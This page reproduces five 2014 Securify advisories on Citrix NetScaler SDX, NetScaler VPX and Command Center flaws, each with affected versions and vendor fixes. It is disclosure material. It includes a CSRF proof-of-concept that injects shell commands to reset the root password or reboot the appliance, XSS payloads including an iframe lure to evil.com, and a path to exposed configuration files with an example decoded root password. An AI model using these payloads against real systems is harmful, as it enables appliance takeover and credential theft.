Search the Community

Citrix NITRO SDK Command Injection ------------------------------------------------------------------------ Command injection vulnerability in Citrix NITRO SDK xen_hotfix page ------------------------------------------------------------------------ Han Sahin, August 2014 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ Securify discovered a command injection vulnerability in xen_hotfix page of the NITRO SDK. The attacker-supplied command is executed with elevated privileges (nsroot). This issue can be used to compromise of the entire Citrix SDX appliance and all underling application's and data. ------------------------------------------------------------------------ Tested version ------------------------------------------------------------------------ This issue was discovered in Citrix NetScaler SDX svm-10.5-50-1.9, other versions may also be affected. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ Citrix reports that this vulnerability is fixed in NetScaler 10.5 build 52.3nc. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20140806/command_injection_vulnerability_in_citrix_nitro_sdk_xen_hotfix_page.html This vulberability exists because the file_name parameter submitted to the /nitro/v1/config/xen_hotfix page used in a shell command without proper input validation/sanitation, introducing a command execution vulnerability. The shell command is executed with elevated privileges (nsroot), which allows attackers to run arbitrary commands with these privileges. This issue can be used to compromise of the entire Citrix SDX appliance and all underling application's and data. The following proof of concept can be used to exploit this issue; <html> <body> <form action="https://SDXHOSTIP/nitro/v1/config/xen_hotfix" method="POST"> <input type="hidden" name="object" value="{"params":{"action":"start"},"xen_hotfix":[{"file_name":"../../etc/passwd;echo nsroot:Securify|chpasswd;"}]}" /> <input type="submit" value="Submit request" /> </form> <script>document.forms[0].submit();</script> </body> </html> POST /nitro/v1/config/xen_hotfix HTTP/1.1 ----------------------------------------- object={"params"%3a{"action"%3a"start"}%2c"xen_hotfix"%3a[{"file_name"../../etc/passwd;reboot;"}]} or object={"params"%3a{"action"%3a"start"}%2c"xen_hotfix"%3a[{"file_name"%3a"../../etc/passwd;echo nsroot:han|chpasswd;"}]} Due to insufficient Cross-Site Request Forgery protection, it is possible to exploit this issue by tricking a logged in admin user into visiting a specially crafted web page. Citrx Command Center Advent JMX Servlet Accessible ------------------------------------------------------------------------ Advent JMX Servlet of Citrx Command Center is accessible to unauthenticated users ------------------------------------------------------------------------ Han Sahin, August 2014 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ It was discovered that the Advent JMX Servlet of Citrix Command Center is accessible to unauthenticated users. This issue can be abused by attackers to comprise the entire application. ------------------------------------------------------------------------ Tested version ------------------------------------------------------------------------ This issue was discovered in Citrix Command Center 5.1 build 33.3 (including patch CC_SP_5.2_40_1.exe), other versions may also be vulnerable. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ Citrix reports that this vulnerability is fixed in Command Center 5.2 build 42.7, which can be downloaded from the following location (login required). https://www.citrix.com/downloads/command-center/product-software/command-center-52-427.html Citrix assigned BUG0494204 to this issue. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20140804/advent_jmx_servlet_of_citrx_command_center_is_accessible_to_unauthenticated_users.html The Advent JMX Servlet is exposed at /servlets/Jmx_dynamic. Functionality exposed by the JMX Servlet can be invoked by an unauthenticated attacker, which can lead to unauthorized remote code execution and comprise of the entire application and services. In addition, this interface is also affected by Cross-Site Scripting. For example: https://<target>:8443/servlets/Jmx_dynamic?fname=<script>alert(document.cookie);</script> Citrix NetScaler VPX Cross Site Scripting ------------------------------------------------------------------------ Citrix NetScaler VPX help pages are vulnerable to Cross-Site Scripting ------------------------------------------------------------------------ Han Sahin, August 2014 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ It was discovered that the help pages of Citrix VPX are vulnerable to Cross-Site Scripting. This issue allows attackers to perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. ------------------------------------------------------------------------ Tested version ------------------------------------------------------------------------ This issue was discovered in Citrix NetScaler VPX NSVPX-ESX-10.5-50.10, other versions may also be vulnerable. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ Citrix reports that this vulnerability is fixed in NetScaler 10.5 build 52.8nc. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20140807/citrix_netscaler_vpx_help_pages_are_vulnerable_to_cross_site_scripting.html This issue exists because the value of the searchQuery URL parameter is assigned client-side to contentDiv.innerHTML (DOM-based Cross-Site Scripting), for example: https://<target>/help/rt/large_search.html?searchQuery=<h1>Reset your password below:<h1><iframe src='http://www.evil.com'/>&type=ctxTV Tricking a victim into visiting a specially crafted URL allows attackers to run arbitrary client-side scripting code within the victim's browser. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Citrix NITRO SDK xen_hotfix Cross Site Scripting ------------------------------------------------------------------------ Citrix NITRO SDK xen_hotfix page is vulnerable to Cross-Site Scripting ------------------------------------------------------------------------ Han Sahin, August 2014 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ A Cross-Site Scripting vulnerability was found in the xen_hotfix page of the Citrix NITRO SDK. This issue allows attackers to perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. ------------------------------------------------------------------------ Tested version ------------------------------------------------------------------------ This issue was discovered in Citrix NetScaler SDX svm-10.5-50-1.9;, other versions may also be affected. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ Citrix reports that this vulnerability is fixed in NetScaler 10.5 build 52.3nc. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20140805/citrix_nitro_sdk_xen_hotfix_page_is_vulnerable_to_cross_site_scripting.html The Cross-Site Scripting vulnerability exists because the REST interface returns an incorrect Content-Type HTTP response header. The interfaces states that the content returned is HTML, while in fact it is JSON. Due to this it is possible to cause browser to render the JSON response as HTML. User input included in the JSON response is JSON encoded, not HTML encoded. Due to this, it is possible to inject arbitrary HTML content in the JSON data that will be rendered and executed by the browser. This issue is exploitable on the /nitro/v1/config/xen_hotfix page through the file_name parameter. Below is an example HTTP response in which this issue is demonstrated. HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Date: Wed, 16 Jul 2014 13:54:53 GMT { "errorcode": 16004, "message": "Failed to obtain uuid for hotfix cmd.xsupdate<img src=a onerror=alert(document.cookie)>, error string = 'xe patch-upload file-name=\"\/root\/cmd.xsupdate<img src=a onerror=alert(document.cookie)>\"\r\nOperation failed. Error: file '\/root\/cmd.xsupdate<img src=a onerror=alert(document.cookie)>' does not exist\r\n\u001b]0;root@NetScaler-sdx:~\u0007[root@NetScaler-sdx ~]#'", "severity": "ERROR" } Proof of concept: <html> <body> <form id="form" method="POST" action="https://<target>/nitro/v1/config/xen_hotfix" enctype="text/plain"> <input type="hidden" name="object" value='{"params"%3a{"action"%3a"start"}%2c"xen_hotfix"%3a [{"file_name"%3a" cmd.xsupdate<img%20src%3da%20onerror%3dalert(document.cookie)>"}]}' /> <input type="submit" value="submit"> </form> <script> document.forms[0].submit(); </script> </body> </html> Citrix Command Center Configuration Disclosure ------------------------------------------------------------------------ Citrix Command Center allows downloading of configuration files ------------------------------------------------------------------------ Han Sahin, August 2014 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ It was discovered that Citrix Command Center stores configuration files containing credentials of managed devices within a folder accessible through the web server. Unauthenticated attackers can download any configuration file stored in this folder, decode passwords stored in these files, and gain privileged access to devices managed by Command Center. ------------------------------------------------------------------------ Tested version ------------------------------------------------------------------------ This issue was discovered in Citrix Command Center 5.1 build 33.3 (including patch CC_SP_5.2_40_1.exe), other versions may also be vulnerable. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ Citrix reports that this vulnerability is fixed in Command Center 5.2 build 42.7, which can be downloaded from the following location (login required). https://www.citrix.com/downloads/command-center/product-software/command-center-52-427.html Citrix assigned BUG0493933 to this issue. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20140802/citrix_command_center_allows_downloading_of_configuration_files.html Configuration files can be downloaded from the conf web folder. Below is an example of a configuration file that can be obtained this way. https://<target>:8443/conf/securitydbData.xml This files contains encoded passwords, for example: <DATA ownername="NULL" password="C70A0eE9os9T2z" username="root"/> These passwords can be decoded trivially. The algorithm used can be found in the JAR file NmsServerClasses.jar. For example the encoded password C70A0eE9os9T2z decodes to SECURIFY123. The credentials stored in these files can than be used to gain privileged access to devices managed by Command Center.